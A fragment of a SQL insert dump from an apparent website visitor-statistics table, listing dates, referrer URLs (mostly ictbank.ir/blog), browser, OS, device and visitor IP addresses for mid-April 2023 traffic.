(31366,'2023-04-12','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','69.50.140.108','000',0,1,0),
(31367,'2023-04-12','https://ictbank.ir/blog','Firefox','Windows','57.0','desktop','Unknown','','74.208.176.88','000',0,1,0),
(31368,'2023-04-12','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.141','000',0,4,0),
(31369,'2023-04-12','https://ictbank.ir/blog','Chrome','Windows','9.0.0.0','desktop','Unknown','','208.80.194.122','000',0,4,0),
(31370,'2023-04-12','https://ictbank.ir/blog','Firefox','Windows','92.0','desktop','Unknown','','144.76.82.57','000',0,1,0),
(31371,'2023-04-12','https://ictbank.ir/blog','Firefox','Windows','58.0','desktop','Unknown','','46.4.65.173','000',0,1,0),
(31372,'2023-04-12','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','162.241.3.21','000',0,1,0),
(31373,'2023-04-12','https://ictbank.ir/blog','Firefox','Windows','45.0','desktop','Unknown','','51.77.52.106','000',0,1,0),
(31374,'2023-04-12','https://ictbank.ir/blog','Firefox','Windows','70.0','desktop','Unknown','','37.225.64.166','000',0,3,0),
(31375,'2023-04-12','https://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','188.147.4.36','000',0,1,0),
(31376,'2023-04-12','https://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','79.185.151.192','000',0,1,0),
(31377,'2023-04-12','https://ictbank.ir/blog','Safari','Windows','Unknown','desktop','Unknown','','79.185.151.189','000',0,1,0),
(31378,'2023-04-12','https://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','37.225.74.17','000',0,2,0),
(31379,'2023-04-12','https://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','188.147.134.237','000',0,1,0),
(31380,'2023-04-12','https://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','188.147.12.9','000',0,1,0),
(31381,'2023-04-12','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','195.96.200.252','000',0,1,0),
(31382,'2023-04-12','https://ictbank.ir/blog','Firefox','Windows','95.0','desktop','Unknown','','144.76.9.147','000',0,1,0),
(31383,'2023-04-12','https://ictbank.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','165.227.230.21','000',0,1,0),
(31384,'2023-04-12','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','82.223.101.73','000',0,1,0),
(31385,'2023-04-12','https://ictbank.ir/blog','Firefox','Windows','95.0','desktop','Unknown','','167.235.132.26','000',0,1,0),
(31386,'2023-04-12','https://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(31387,'2023-04-12','https://ictbank.ir/blog','Firefox','Windows','64.0','desktop','Unknown','','89.58.18.90','000',0,1,0),
(31388,'2023-04-12','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.14.138.191','000',0,1,0),
(31389,'2023-04-12','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','49.51.194.207','000',0,27,0),
(31390,'2023-04-12','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','91.244.12.175','000',0,5,0),
(31391,'2023-04-12','https://ictbank.ir/blog','Firefox','Windows','89.0','desktop','Unknown','','213.32.19.176','000',0,1,0),
(31392,'2023-04-12','https://ictbank.ir/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.254.25.10','000',0,1,0),
(31393,'2023-04-12','https://ictbank.ir/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.94.28','000',0,2,0),
(31394,'2023-04-12','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','154.209.125.115','000',0,3,0),
(31395,'2023-04-12','https://ictbank.ir/blog','Firefox','Windows','104.0','desktop','Unknown','','93.158.91.209','000',0,1,0),
(31396,'2023-04-12','https://ictbank.ir/blog','Firefox','Windows','104.0','desktop','Unknown','','93.158.91.224','000',0,2,0),
(31397,'2023-04-12','https://ictbank.ir/blog','Firefox','Windows','104.0','desktop','Unknown','','93.158.91.204','000',0,1,0),
(31398,'2023-04-12','https://ictbank.ir/blog','Firefox','Windows','40.0','desktop','Unknown','','124.70.178.238','000',0,1,0),
(31399,'2023-04-12','https://ictbank.ir/blog','Firefox','Linux','73.0','desktop','Unknown','','167.99.122.106','000',0,1,0),
(31400,'2023-04-12','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','192.3.232.23','000',0,2,0),
(31401,'2023-04-12','https://ictbank.ir/blog','Chrome','Windows','81.0.0.0','desktop','Unknown','','95.83.134.7','000',0,1,0),
(31402,'2023-04-12','https://ictbank.ir/blog','Firefox','Windows','61.0','desktop','Unknown','','67.43.12.201','000',0,1,0),
(31403,'2023-04-12','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','128.1.39.90','000',0,9,0),
(31404,'2023-04-12','https://ictbank.ir/blog','Chrome','Windows','14.0.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(31405,'2023-04-12','https://ictbank.ir/blog','Firefox','Windows','93.0','desktop','Unknown','','79.139.61.86','000',0,1,0),
(31406,'2023-04-12','https://ictbank.ir/blog/','Chrome','Windows','103.0.0.0','desktop','Unknown','','136.169.243.52','000',0,14,0),
(31407,'2023-04-12','https://ictbank.ir/blog','Firefox','Windows','84.0','desktop','Unknown','','121.40.236.199','000',0,1,0),
(31408,'2023-04-12','https://ictbank.ir/blog','Firefox','Windows','42.0','desktop','Unknown','','185.241.64.136','000',0,1,0),
(31409,'2023-04-12','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.42','000',0,1,0),
(31410,'2023-04-12','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.212.252.188','000',0,2,0),
(31411,'2023-04-12','https://www.ictbank.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','45.249.246.151','000',0,1,0),
(31412,'2023-04-12','https://ictbank.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','118.193.45.5','000',0,1,0),
(31413,'2023-04-12','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','103.175.206.43','000',0,1,0),
(31414,'2023-04-12','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','5.135.152.155','000',0,1,0),
(31415,'2023-04-12','https://ictbank.ir/blog','Firefox','Windows','84.0','desktop','Unknown','','5.196.121.88','000',0,1,0),
(31416,'2023-04-12','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.130.14.215','000',0,1,0),
(31417,'2023-04-12','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.6','000',0,1,0),
(31418,'2023-04-12','https://ictbank.ir/blog','Firefox','Windows','60.0','desktop','Unknown','','149.56.103.13','000',0,1,0),
(31419,'2023-04-12','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','81.93.142.130','000',0,1,0),
(31420,'2023-04-12','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','85.215.109.164','000',0,2,0),
(31421,'2023-04-12','https://ictbank.ir/blog','Firefox','Windows','49.0','desktop','Unknown','','144.91.110.8','000',0,1,0),
(31422,'2023-04-12','https://design-arena.ir/blog','Chrome','Windows','71.0.0.0','desktop','Unknown','','77.74.177.119','000',0,2,0),
(31423,'2023-04-12','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','15.235.10.34','000',0,1,0),
(31424,'2023-04-12','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','3.131.4.125','000',0,1,0),
(31425,'2023-04-12','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.125','000',0,6,0),
(31426,'2023-04-12','https://ictbank.ir/blog','Firefox','Windows','45.0','desktop','Unknown','','52.45.114.130','000',0,1,0),
(31427,'2023-04-12','https://ictbank.ir/blog','Firefox','Windows','55.0','desktop','Unknown','','8.129.122.24','000',0,1,0),
(31428,'2023-04-12','https://nikoo-academy.com/masoudnikoofar','Chrome','Android','96.0.0.0','mobile:smart','Galaxy A72','','5.123.88.148','000',0,1,0),
(31429,'2023-04-12','https://ictbank.ir/blog','Firefox','Windows','86.0','desktop','Unknown','','51.91.45.145','000',0,1,0),
(31430,'2023-04-12','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','23.172.112.77','000',0,1,0),
(31431,'2023-04-13','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,4,0),
(31432,'2023-04-13','https://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','213.32.122.82','000',0,1,0),
(31433,'2023-04-13','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','190.92.159.48','000',0,1,0),
(31434,'2023-04-13','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','99.0.0.0','desktop','Unknown','','185.119.81.98','000',0,4,0),
(31435,'2023-04-13','https://ictbank.ir/blog','Firefox','Windows','66.0','desktop','Unknown','','51.75.207.99','000',0,1,0),
(31436,'2023-04-13','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(31437,'2023-04-13','https://ictbank.ir/blog','Chrome','OS X','111.0.0.0','desktop','Macintosh','','15.204.182.106','000',0,2,0),
(31438,'2023-04-13','https://www.bing.com/','Edge','Windows','112.0.0.0','desktop','Unknown','','67.159.130.70','000',0,3,0),
(31439,'2023-04-13','https://ictbank.ir/blog','Chrome','Windows','85.0.0.0','desktop','Unknown','','104.221.140.204','000',0,18,0),
(31440,'2023-04-13','https://ictbank.ir/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','45.67.57.159','000',0,1,0),
(31441,'2023-04-13','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','94.102.49.193','000',0,2,0),
(31442,'2023-04-13','https://ictbank.ir/blog','Chrome','Windows','14.0.0.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(31443,'2023-04-13','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(31444,'2023-04-13','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.71','000',0,2,0),
(31445,'2023-04-13','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','43.128.96.34','000',0,1,0),
(31446,'2023-04-13','https://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(31447,'2023-04-13','https://ictbank.ir/blog','Firefox','Windows','110.0','desktop','Unknown','','34.212.114.15','000',0,3,0),
(31448,'2023-04-13','https://ictbank.ir/blog','Chrome','OS X','104.0.0.0','desktop','Macintosh','','85.193.95.8','000',0,1,0),
(31449,'2023-04-13','https://ictbank.ir/blog','Chrome','Windows','63.0.0.0','desktop','Unknown','','123.125.122.27','000',0,1,0),
(31450,'2023-04-13','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','93.158.90.137','000',0,1,0),
(31451,'2023-04-13','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','93.158.90.141','000',0,2,0),
(31452,'2023-04-13','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','93.158.90.156','000',0,1,0),
(31453,'2023-04-13','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','193.37.254.188','000',0,1,0),
(31454,'2023-04-13','https://ictbank.ir/blog','Chrome','OS X','36.0.0.0','desktop','Macintosh','','162.221.197.233','000',0,4,0),
(31455,'2023-04-13','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','154.209.125.115','000',0,3,0),
(31456,'2023-04-13','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,2,0),
(31457,'2023-04-13','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','85.208.136.198','000',0,2,0),
(31458,'2023-04-13','https://ictbank.ir/blog','Firefox','Windows','86.0','desktop','Unknown','','62.171.178.15','000',0,4,0),
(31459,'2023-04-13','https://ictbank.ir/blog','Firefox','Windows','86.0','desktop','Unknown','','51.195.103.201','000',0,4,0),
(31460,'2023-04-13','https://ictbank.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','101.36.107.222','000',0,1,0),
(31461,'2023-04-13','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','170.106.189.33','000',0,1,0),
(31462,'2023-04-13','https://ictbank.ir/blog','Chrome','Windows','16.0.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(31463,'2023-04-13','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.91.18.139','000',0,2,0),
(31464,'2023-04-13','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','107.180.121.58','000',0,1,0),
(31465,'2023-04-13','https://ictbank.ir/blog','Firefox','Windows','86.0','desktop','Unknown','','185.178.194.152','000',0,4,0),
(31466,'2023-04-13','https://ictbank.ir/blog','Firefox','Windows','86.0','desktop','Unknown','','124.70.178.238','000',0,4,0),
(31467,'2023-04-13','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','111.90.145.188','000',0,1,0),
(31468,'2023-04-13','https://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','104.236.4.15','000',0,2,0),
(31469,'2023-04-13','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','62.113.195.18','000',0,1,0),
(31470,'2023-04-13','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','159.65.44.109','000',0,5,0),
(31471,'2023-04-13','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','34.221.197.9','000',0,2,0),
(31472,'2023-04-14','http://design-arena.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','185.129.248.170','000',0,5,0),
(31473,'2023-04-14','https://ictbank.ir/blog','Safari','OS X','5.0','desktop','Macintosh','','208.80.194.122','000',0,2,0),
(31474,'2023-04-14','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','194.169.175.26','000',0,2,0),
(31475,'2023-04-14','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.121','000',0,4,0),
(31476,'2023-04-14','https://ictbank.ir/blog','Firefox','Windows','73.0','desktop','Unknown','','149.56.20.160','000',0,1,0),
(31477,'2023-04-14','https://ictbank.ir/blog/','Firefox','Windows','3.0.0','desktop','Unknown','','193.138.7.168','000',0,1,0),
(31478,'2023-04-14','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','154.209.125.115','000',0,3,0),
(31479,'2023-04-14','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','213.52.129.21','000',0,1,0),
(31480,'2023-04-14','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.141.34','000',0,2,0),
(31481,'2023-04-14','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','80.82.77.33','000',0,2,0),
(31482,'2023-04-14','https://ictbank.ir/blog','Chrome','OS X','11.0.0.0','desktop','Macintosh','','208.80.194.126','000',0,2,0),
(31483,'2023-04-14','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','98.0.0.0','desktop','Unknown','','185.119.81.102','000',0,2,0),
(31484,'2023-04-14','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.162.40.232','000',0,1,0),
(31485,'2023-04-14','http://baidu.com/','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','27.115.124.118','000',0,1,0),
(31486,'2023-04-14','http://baidu.com/','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','42.236.10.125','000',0,1,0),
(31487,'2023-04-14','https://ictbank.ir/blog','Chrome','OS X','112.0.0.0','desktop','Macintosh','','140.99.199.40','000',0,1,0),
(31488,'2023-04-14','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.209.242','000',0,1,0),
(31489,'2023-04-14','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(31490,'2023-04-14','https://neginghavami.ir/blog','Chrome','Android','81.0.0.0','mobile:smart','Nexus 5','','124.223.196.50','000',0,1,0),
(31491,'2023-04-14','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.72','000',0,2,0),
(31492,'2023-04-14','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,2,0),
(31493,'2023-04-14','http://neginghavami.ir/','Vivo Browser','Android','8.0.0.0','mobile:smart','Unknown','','118.193.38.223','000',0,3,0),
(31494,'2023-04-14','https://ictbank.ir/blog','Vivaldi','OS X','5.0.0.0','desktop','Macintosh','','37.46.113.158','000',0,12,0),
(31495,'2023-04-14','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.133.58','000',0,3,0),
(31496,'2023-04-14','https://ictbank.ir/blog','Safari','OS X','15.0.0','desktop','Macintosh','','104.227.61.251','000',0,1,0),
(31497,'2023-04-14','http://neginghavami.ir/','Vivo Browser','Android','8.0.0.0','mobile:smart','Unknown','','118.193.38.189','000',0,3,0),
(31498,'2023-04-14','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,2,0),
(31499,'2023-04-14','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','172.187.192.35','000',0,1,0),
(31500,'2023-04-14','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','160.153.147.27','000',0,1,0),
(31501,'2023-04-14','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','194.233.91.204','000',0,1,0),
(31502,'2023-04-14','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.89.31.203','000',0,2,0),
(31503,'2023-04-14','https://ictbank.ir/blog','Firefox','OS X','111.0','desktop','Macintosh','','5.120.143.127','000',0,3,0),
(31504,'2023-04-14','https://ictbank.ir/blog','Opera','Linux','85.0.0.0','desktop','Unknown','','151.248.1.125','000',0,1,0),
(31505,'2023-04-14','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','164.132.145.162','000',0,1,0),
(31506,'2023-04-14','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','3.231.205.67','000',0,1,0),
(31507,'2023-04-14','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','170.106.116.71','000',0,1,0),
(31508,'2023-04-14','http://ictbank.ir/blog/wp-login.php','Chrome','OS X','70.0.0.0','desktop','Macintosh','','167.172.119.162','000',0,3,0),
(31509,'2023-04-14','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','34.221.197.9','000',0,2,0),
(31510,'2023-04-14','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','208.109.34.70','000',0,1,0),
(31511,'2023-04-14','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(31512,'2023-04-14','https://ictbank.ir/blog','Chrome','OS X','26.0.0.0','desktop','Macintosh','','35.87.128.199','000',0,1,0),
(31513,'2023-04-14','https://ictbank.ir/blog/','Chrome','Windows','103.0.0.0','desktop','Unknown','','95.105.124.185','000',0,5,0),
(31514,'2023-04-15','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','91.244.12.175','000',0,3,0),
(31515,'2023-04-15','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','192.3.232.23','000',0,2,0),
(31516,'2023-04-15','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','69.50.140.108','000',0,1,0),
(31517,'2023-04-15','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','172.125.124.159','000',0,127,0),
(31518,'2023-04-15','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','43.134.130.106','000',0,2,0),
(31519,'2023-04-15','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,2,0),
(31520,'2023-04-15','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','47.91.124.195','000',0,1,0),
(31521,'2023-04-15','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(31522,'2023-04-15','https://ictbank.ir/blog','Chrome','OS X','26.0.0.0','desktop','Macintosh','','52.37.6.218','000',0,1,0),
(31523,'2023-04-15','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','157.245.107.85','000',0,1,0),
(31524,'2023-04-15','https://ictbank.ir/blog','Chrome','Windows','65.0.0.0','desktop','Unknown','','163.172.56.94','000',0,2,0),
(31525,'2023-04-15','https://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(31526,'2023-04-15','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','154.209.125.115','000',0,3,0),
(31527,'2023-04-15','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.158.37.190','000',0,2,0),
(31528,'2023-04-15','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(31529,'2023-04-15','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,1,0),
(31530,'2023-04-15','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','93.90.200.43','000',0,4,0),
(31531,'2023-04-15','https://ictbank.ir/blog/','Chrome','Windows','103.0.0.0','desktop','Unknown','','95.105.124.185','000',0,10,0),
(31532,'2023-04-15','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.184.154.110','000',0,1,0),
(31533,'2023-04-15','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','93.158.90.162','000',0,1,0),
(31534,'2023-04-15','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','93.158.90.168','000',0,1,0),
(31535,'2023-04-15','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','93.158.90.156','000',0,1,0),
(31536,'2023-04-15','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','93.158.90.141','000',0,1,0),
(31537,'2023-04-15','https://design-arena.ir/blog','Firefox','Windows','111.0','desktop','Unknown','','5.100.255.107','000',0,5,0),
(31538,'2023-04-15','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','23.90.160.146','000',0,1,0),
(31539,'2023-04-15','https://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(31540,'2023-04-15','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','47.0.0.0','desktop','Unknown','','185.119.81.102','000',0,4,0),
(31541,'2023-04-15','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','111.0.0.0','desktop','Unknown','','97.107.132.87','000',0,2,0),
(31542,'2023-04-15','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','20.109.101.102','000',0,1,0),
(31543,'2023-04-15','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','114.43.178.66','000',0,127,0),
(31544,'2023-04-15','http://45.92.94.221:80/','Chrome','Windows','99.0.0.0','desktop','Unknown','','185.163.47.8','000',0,1,0),
(31545,'2023-04-15','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','34.201.210.58','000',0,1,0),
(31546,'2023-04-15','https://ictbank.ir/blog','Chrome','Windows','59.0.0.0','desktop','Unknown','','23.20.146.110','000',0,1,0),
(31547,'2023-04-15','https://ictbank.ir/blog','Opera','Windows','89.0.0.0','desktop','Unknown','','37.46.113.174','000',0,12,0),
(31548,'2023-04-15','https://45.92.94.221/blog','Chrome','Linux','44.0.0.0','desktop','Unknown','','134.122.54.44','000',0,3,0),
(31549,'2023-04-15','https://ictbank.ir/blog','Firefox','OS X','68.0','desktop','Macintosh','','152.89.196.77','000',0,1,0),
(31550,'2023-04-15','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,4,0),
(31551,'2023-04-15','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','144.126.141.212','000',0,1,0),
(31552,'2023-04-15','https://ictbank.ir/dashtpodcast/archives/62','Samsung Internet','Android','19.0','mobile:smart','Galaxy A7 (2017)','','5.123.34.111','000',0,1,0),
(31553,'2023-04-15','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','212.48.52.174','000',0,1,0),
(31554,'2023-04-15','https://ictbank.ir/blog','Firefox','Windows','86.0','desktop','Unknown','','5.39.90.28','000',0,13,0),
(31555,'2023-04-15','https://ictbank.ir/blog','Firefox','Windows','86.0','desktop','Unknown','','79.139.61.86','000',0,13,0),
(31556,'2023-04-15','https://45.92.94.221/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','106.75.166.184','000',0,1,0),
(31557,'2023-04-15','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','109.169.10.8','000',0,3,0),
(31558,'2023-04-15','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.148','000',0,1,0),
(31559,'2023-04-15','https://ictbank.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','152.32.252.184','000',0,1,0),
(31560,'2023-04-16','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(31561,'2023-04-16','https://ictbank.ir/blog','Opera','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(31562,'2023-04-16','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,18,0),
(31563,'2023-04-16','https://ictbank.ir/blog','Chrome','OS X','39.0.0.0','desktop','Macintosh','','18.218.218.186','000',0,38,0),
(31564,'2023-04-16','https://ictbank.ir/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.131','000',0,1,0),
(31565,'2023-04-16','https://ictbank.ir/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','95.213.172.135','000',0,1,0),
(31566,'2023-04-16','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.158.37.186','000',0,1,0),
(31567,'2023-04-16','http://ictbank.ir/blog/index.php/feed/','Chrome','Windows','109.0.0.0','desktop','Unknown','','51.89.152.216','000',0,2,0),
(31568,'2023-04-16','https://ictbank.ir/blog','Chrome','iOS','111.0.0.0','mobile:smart','iPhone','','162.55.125.104','000',0,4,0),
(31569,'2023-04-16','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','80.94.92.60','000',0,3,0),
(31570,'2023-04-16','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','162.241.252.209','000',0,1,0),
(31571,'2023-04-16','https://ictbank.ir/blog','Chrome','Android','109.0.0.0','mobile:smart','Unknown','','45.154.98.214','000',0,6,0),
(31572,'2023-04-16','https://www.google.com/','Chrome','Windows','112.0.0.0','desktop','Unknown','','70.66.225.47','000',0,1,0),
(31573,'2023-04-16','https://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(31574,'2023-04-16','https://ictbank.ir/blog','Chrome','OS X','36.0.0.0','desktop','Macintosh','','128.14.188.211','000',0,2,0),
(31575,'2023-04-16','https://ictbank.ir/blog','Chrome','OS X','112.0.0.0','desktop','Macintosh','','5.208.130.148','000',0,5,0),
(31576,'2023-04-16','https://ictbank.ir/blog','Chrome','Windows','50.0.0.0','desktop','Unknown','','54.161.139.150','000',0,2,0),
(31577,'2023-04-16','https://ictbank.ir/blog','Firefox','Windows','66.0','desktop','Unknown','','51.254.199.11','000',0,2,0),
(31578,'2023-04-16','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','63.0.0.0','desktop','Unknown','','185.119.81.102','000',0,2,0),
(31579,'2023-04-16','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.220.117.104','000',0,1,0),
(31580,'2023-04-16','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','103.151.157.142','000',0,38,0),
(31581,'2023-04-16','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.51.230.27','000',0,1,0),
(31582,'2023-04-16','https://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(31583,'2023-04-16','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','186.234.80.229','000',0,1,0),
(31584,'2023-04-16','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','142.11.214.227','000',0,1,0),
(31585,'2023-04-16','https://ictbank.ir/blog','Safari','iOS','11.0','tablet','iPad','','50.31.21.10','000',0,1,0),
(31586,'2023-04-16','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','185.163.109.66','000',0,2,0),
(31587,'2023-04-16','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
